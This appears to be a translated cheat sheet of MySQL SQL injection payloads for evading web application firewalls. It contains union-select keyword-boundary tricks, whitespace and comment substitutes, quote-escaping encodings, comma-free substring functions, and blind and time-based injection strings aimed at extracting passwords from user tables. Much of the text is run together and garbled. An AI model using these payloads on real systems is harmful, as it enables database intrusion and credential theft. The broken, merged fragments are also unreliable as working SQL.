General SQL Injection bypass skills (using mysql features)

General SQL Injection bypass skills (using mysql features)

Directly add syntax

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

Generally, waf recognizes word boundaries of keywords such as union during defense, but this statement can bypass the determination of word boundaries.

I came out of fuzz and learned about it. I probably used the syntax analysis to analyze the floating click index, and then the context ended. Then I executed the subsequent statements directly.

==================================================where id=.1union/*.1*/select-.1where id=.1union/*.1*/select!.1where id=.1union/*.1*/select~.1where id=.1union/*.1*/select(1)where id=.1union/*.1*/select`host`from mysql.userwhere id=.1union/*.1*/select'1'where id=.1union/*.1*/select"1"where id=.1union/*.1*/select@1================================================

Mysql .txt

Mysql:

Space, and with the symbol (and or), single quotation marks, comma ",", double quotation marks ", truncation symbols such :(#--/*)

Space:

select * from(user);select * from`user`;'and(true)like(false)union(select(pass)from(users))#'union [all|distinct] select pass from users#09 Horizontal Tab0A New Line0B Vertical Tab0C New Page0D Carriage ReturnA0 Non-breaking Space20 Space

And the symbol (and or ):

select * from user where host ='localhost' && 0=0 limit 0,1;select * from user where host ='localhost' || 1=1 limit 0,1;20 Space2B +2D -7E ~21 !40 @Example:SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

● Prefixes (combine arbitrarily any combination of single-object operators): + -~ !

'Or -- + 2 = --!!! '2

● Operators: ^, = ,! =, %,/, *, &, &, |, ||,<, >>,<, >=, <=, <>, <=>,

XOR, DIV, sounds like, RLIKE, REGEXP, IS, NOT, ,...

'Or 1

Single quotes:

'-GBK encoding % df';'-% 2527 UNICODE encoding

Comma:

Union select * FROM (SELECT 1) a JOIN (SELECT 2) B JOIN (SELECT 3) c) // MySQL> SELECT * FROM (SELECT * FROM user a join user B) C; ERROR 1060 (42S21 ): duplicate column name 'host' mysql> SELECT * FROM (SELECT * FROM user a join user B USING (Host) C; ERROR 1060 (42S21 ): duplicate column name 'user' mysql> SELECT * FROM (SELECT * FROM User a join user B USING (Host, user) C; ERROR 1060 (42S21 ): duplicate column name 'Password'

Double quotation marks:

Similar Single quotes

Encoding:

' or 'a' = n'a # unicode' or 'a' = b'1100001 # binary' or 'a' = x'61 # hexadecimal' and substr(data,1,1) = 0x61# 0x6162' and substr(data,1,1) = unhex(61)# unhex(6162)' and substr(data,1,1) = char(97)# char(97,98)String builder (3)

● Previous functions are well known

● My favorite:

' and substr(data,1,1) = lower(conv(10,10,36))# 'a'' and substr(data,1,1) = lower(conv(11,10,36))# 'b'' and substr(data,1,1) = lower(conv(36,10,36))# 'z'

Truncation symbol:

Common :#--/*

-- - SQL comment;%00 Nullbyte` Backtick

Blind note:

AND MID(VERSION(),1,1) = '5'AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'' and substr(data,1,1) = 'a'#' and substring(data,1,1) = 'a'#' and mid(data,1,1) = 'a'#

● All 3 functions work without comma (comma) too:

' and substr(data from 1 for 1) = 'a'#lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'left(data,1)reverse(right(reverse(data),1))insert(insert(version(),1,0,space(0)),2,222,space(0))

● Subselect:

1'and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit1,1)and'1Some functions allow to search substrings:'-if(locate('f',data),1,0)#'-if(locate('fo',data),1,0)#'-if(locate('foo',data),1,0)#

● Some functions allow to cut substrings:

length(trim(leading 'a' FROM data)) # length will be shorterlength(replace(data, 'a', '')) # length will be shorterSubselect:foo'div count(select`pass`from(users)where mid(pass,1,1)rlikelower(conv(10,pi()*pi(),pi()*pi())) )-'0Blind SQL InjectionExample: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))

Latency:

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - 'Nope:false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29conv([10-36],10,36)false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 Ktrue !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 Ltrue+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 Mfloor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 Nceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 Ofloor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 Pceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Qceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 Rfloor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 Sfloor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T